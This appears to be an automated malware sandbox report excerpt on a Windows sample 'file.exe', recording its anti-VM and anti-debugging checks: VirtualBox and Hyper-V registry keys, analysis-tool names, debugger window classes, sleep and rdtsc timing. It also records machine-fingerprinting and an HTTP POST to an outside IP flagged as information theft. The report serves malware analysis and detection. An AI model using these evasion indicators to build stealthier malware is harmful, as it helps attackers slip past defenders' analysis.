Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00719980 rdtsc 0_2_00719980
Source: C:\Users\user\Desktop\file.exe TID: 6804 Thread sleep count: 36 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6804 Thread sleep time: -72036s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6968 Thread sleep count: 65 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6968 Thread sleep time: -130065s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5492 Thread sleep count: 65 > 30
Source: C:\Users\user\Desktop\file.exe TID: 5492 Thread sleep time: -130065s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 1308 Thread sleep count: 55 > 30
Source: C:\Users\user\Desktop\file.exe TID: 1308 Thread sleep time: -110055s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2172 Thread sleep count: 56 > 30
Source: C:\Users\user\Desktop\file.exe TID: 2172 Thread sleep time: -112056s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5496 Thread sleep count: 53 > 30
Source: C:\Users\user\Desktop\file.exe TID: 5496 Thread sleep time: -106053s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6716 Thread sleep count: 59 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6716 Thread sleep time: -118059s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5632 Thread sleep count: 60 > 30
Source: C:\Users\user\Desktop\file.exe TID: 5632 Thread sleep time: -120060s >= -30000s
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0053255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses, 0_2_0053255D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, 0_2_005329FF
Source: file.exe, file.exe, 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: file.exe Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: file.exe, 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2629736059.00000000016FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2630078979.000000000170C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2630026091.00000000016FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2606683274.00000000016CA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073486658.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2629692014.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2632082566.000000000170D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07230A43 Start: 07230A27 End: 07230A22 0_2_07230A43
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07290486 Start: 07290582 End: 07290588 0_2_07290486
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00719980 rdtsc 0_2_00719980
Source: file.exe, file.exe, 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: procmon.exe
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic TCP traffic: 192.168.2.5:49705 -> 34.118.84.150:80